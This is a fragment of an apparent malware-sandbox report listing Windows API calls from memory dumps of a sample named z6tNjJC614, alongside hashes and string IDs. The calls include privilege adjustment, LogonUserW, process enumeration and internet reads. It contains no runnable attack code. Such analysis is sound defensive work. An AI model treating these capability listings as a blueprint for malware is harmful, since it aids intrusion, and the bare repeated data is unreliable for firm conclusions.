                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 99427753-0
                                                                      • Opcode ID: 8cc1a5b50c26e7bbf2a75ab5cf8c23d8050699f5e3f7131e19fb7ff855cabeff
                                                                      • Instruction ID: d42bb2986d160ac6bb01e6ddf32579d8ac3598141684b6096f25d3c06082c53d
                                                                      • Opcode Fuzzy Hash: 8cc1a5b50c26e7bbf2a75ab5cf8c23d8050699f5e3f7131e19fb7ff855cabeff
                                                                      • Instruction Fuzzy Hash: E941D475A00201AFEB10BF648C9AFBE7BE8FF85714F048458F915AB3C2CA709D418791
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: fa5057c1582fcd94f0e198b34caacd8f2cf37ceeddd48c62fd0e84045e3a79bf
                                                                      • Instruction ID: a293a2c2db6ded7ea625a9ff1805206902ae16363a3259f049877e64b8260ded
                                                                      • Opcode Fuzzy Hash: fa5057c1582fcd94f0e198b34caacd8f2cf37ceeddd48c62fd0e84045e3a79bf
                                                                      • Instruction Fuzzy Hash: 1311B2313009116BEF225F26DC48A6A7F98FF957A1B514839F846D3241EBB09C5187A0
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005680C0
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005680CA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005680D9
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005680E0
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005680F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: cce7b05ab56caae513692822f5efbcd66820207a91183bc5adbc651ecfb688b0
                                                                      • Instruction ID: 866658d2bdaac867ec3226288b51f76160f30722f14daf9ba46bd021dc55b986
                                                                      • Opcode Fuzzy Hash: cce7b05ab56caae513692822f5efbcd66820207a91183bc5adbc651ecfb688b0
                                                                      • Instruction Fuzzy Hash: E1F01931240204AFEB100FA5EC8DE7A3BACFF4A755B150126F945C6150CA719846EB60
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 0057C432
                                                                      • CoCreateInstance.OLE32(005A2D6C,00000000,00000001,005A2BDC,?), ref: 0057C44A
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • CoUninitialize.OLE32 ref: 0057C6B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                      • String ID: .lnk
                                                                      • API String ID: 2683427295-24824748
                                                                      • Opcode ID: 50e81ba80197fb3692f53ddf8dd811adb09318231275b518374daf739af583f1
                                                                      • Instruction ID: 256de32b51926a6408d0be2eb906e486dc90b20da69ac175b084a37a02d35aec
                                                                      • Opcode Fuzzy Hash: 50e81ba80197fb3692f53ddf8dd811adb09318231275b518374daf739af583f1
                                                                      • Instruction Fuzzy Hash: 31A12971104206AFE700EF64C895EABBBECFFD9354F00491DF15587192EB71AA89CB92
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00514AD0), ref: 00514B45
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00514B57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: f3a656bd8e76f94a1d526d0b6cf12b73cc1687ab2cf4d84dfb8f1b1bd5b62d0b
                                                                      • Instruction ID: 37c170cea847a80afc336129d831e02a91042124c4f0c1a6649ddec70984abb0
                                                                      • Opcode Fuzzy Hash: f3a656bd8e76f94a1d526d0b6cf12b73cc1687ab2cf4d84dfb8f1b1bd5b62d0b
                                                                      • Instruction Fuzzy Hash: 5DD01274A10713CFDB209F31E818B467AE5BF15351B15883A94C5D6150D770D4C0DB54
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0058EE3D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0058EE4B
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0058EF0B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058EF1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                      • String ID:
                                                                      • API String ID: 2576544623-0
                                                                      • Opcode ID: 92e2afb3da72be8f6171e2720b53aa9c3be30ebf2a37370583deb566e7d04a15
                                                                      • Instruction ID: db7f1ad0103d20d9434ca36909bd0900fb51f37876ac286ad8ce307627433b6d
                                                                      • Opcode Fuzzy Hash: 92e2afb3da72be8f6171e2720b53aa9c3be30ebf2a37370583deb566e7d04a15
                                                                      • Instruction Fuzzy Hash: 39516271504305AFD310EF24DC4AEABBBE8FFD8710F50481DF99596251EB709948CB92
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0056E628
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0058180A,00000000), ref: 005823E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00582418
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0057B343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0057B39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0057B3EA
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
  • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0056882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00568858
• GetLastError.KERNEL32 ref: 00568865
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00568774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0056878B
• FreeSid.ADVAPI32(?), ref: 0056879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• __time64.LIBCMT ref: 0057889B
  • Part of subcall function 0053520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00578F6E,00000000,?,?,?,?,0057911F,00000000,?), ref: 00535213
  • Part of subcall function 0053520A: __aulldiv.LIBCMT ref: 00535233
Strings
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: 0e]
• API String ID: 2893107130-3598356009
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0057C6FB
• FindClose.KERNEL32(00000000), ref: 0057C72B
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00589468,?,0059FB84,?), ref: 0057A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00589468,?,0059FB84,?), ref: 0057A0A9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568309), ref: 005681E0
• CloseHandle.KERNEL32(?,?,00568309), ref: 005681F2
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00538D57,?,?,?,00000001), ref: 0053A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0053A163
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00574C76
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: mouse_event
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00568389), ref: 005687D1
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: LogonUser
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0053A12A
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
APIs
• DeleteObject.GDI32(00000000), ref: 0058785B
• DeleteObject.GDI32(00000000), ref: 0058786D
• DestroyWindow.USER32 ref: 0058787B
• GetDesktopWindow.USER32 ref: 00587895
• GetWindowRect.USER32(00000000), ref: 0058789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005879DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005879ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587A35
• GetClientRect.USER32(00000000,?), ref: 00587A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00587A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587ABB
• GlobalLock.KERNEL32(00000000), ref: 00587AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00587ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587AE3
• GlobalFree.KERNEL32(00000000), ref: 00587AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,005A2CAC,00000000), ref: 00587B16
• GlobalFree.KERNEL32(00000000), ref: 00587B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00587B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00587B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587D7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
APIs
• CharUpperBuffW.USER32(?,?,0059F910), ref: 00593627
• IsWindowVisible.USER32(?), ref: 0059364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                      • API String ID: 4105515805-45149045
                                                                      • Opcode ID: 38dbe5f95d6a16b3f398317b0df359333763fc9763da9e67586fc15f8cc67126
                                                                      • Instruction ID: 6f0cb16492441ac53019650060e81dbfbeb0c937fc92626aae75349e852a0d45
                                                                      • Opcode Fuzzy Hash: 38dbe5f95d6a16b3f398317b0df359333763fc9763da9e67586fc15f8cc67126
                                                                      • Instruction Fuzzy Hash: 9ED12970208302DFCF14EF50C569AAE7FE5BF95354F144868F8865B2A2DB21EE4ACB45
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0059A630
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0059A661
                                                                      • GetSysColor.USER32(0000000F), ref: 0059A66D
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0059A687
                                                                      • SelectObject.GDI32(?,00000000), ref: 0059A696
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0059A6C1
                                                                      • GetSysColor.USER32(00000010), ref: 0059A6C9
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0059A6D0
                                                                      • FrameRect.USER32(?,?,00000000), ref: 0059A6DF
                                                                      • DeleteObject.GDI32(00000000), ref: 0059A6E6
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0059A731
                                                                      • FillRect.USER32(?,?,00000000), ref: 0059A763
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059A78E
                                                                        • Part of subcall function 0059A8CA: GetSysColor.USER32(00000012), ref: 0059A903
                                                                        • Part of subcall function 0059A8CA: SetTextColor.GDI32(?,?), ref: 0059A907
                                                                        • Part of subcall function 0059A8CA: GetSysColorBrush.USER32(0000000F), ref: 0059A91D
                                                                        • Part of subcall function 0059A8CA: GetSysColor.USER32(0000000F), ref: 0059A928
                                                                        • Part of subcall function 0059A8CA: GetSysColor.USER32(00000011), ref: 0059A945
                                                                        • Part of subcall function 0059A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059A953
                                                                        • Part of subcall function 0059A8CA: SelectObject.GDI32(?,00000000), ref: 0059A964
                                                                        • Part of subcall function 0059A8CA: SetBkColor.GDI32(?,00000000), ref: 0059A96D
                                                                        • Part of subcall function 0059A8CA: SelectObject.GDI32(?,?), ref: 0059A97A
                                                                        • Part of subcall function 0059A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0059A999
                                                                        • Part of subcall function 0059A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059A9B0
                                                                        • Part of subcall function 0059A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0059A9C5
                                                                        • Part of subcall function 0059A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059A9ED
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: c3a475b3f460948e080f58fbe2cfc04861b632a7659b6be0848eea80771e61e4
                                                                      • Instruction ID: c2cc1b81c6041aa9421dec3a96162f15d0c6f8b6a3f904e90bd247eb2ed2e36c
                                                                      • Opcode Fuzzy Hash: c3a475b3f460948e080f58fbe2cfc04861b632a7659b6be0848eea80771e61e4
                                                                      • Instruction Fuzzy Hash: DD918E72408301FFCB109F64DC08A5B7BA9FF88321F151B2AF962D61A0D771D948DBA2
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?), ref: 00512CA2
                                                                      • DeleteObject.GDI32(00000000), ref: 00512CE8
                                                                      • DeleteObject.GDI32(00000000), ref: 00512CF3
                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00512CFE
                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00512D09
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0054C43B
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0054C474
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0054C89D
                                                                        • Part of subcall function 00511B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512036,?,00000000,?,?,?,?,005116CB,00000000,?), ref: 00511B9A
                                                                      • SendMessageW.USER32(?,00001053), ref: 0054C8DA
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0054C8F1
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054C907
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054C912
                                                                      Strings
                                                                      Similarity
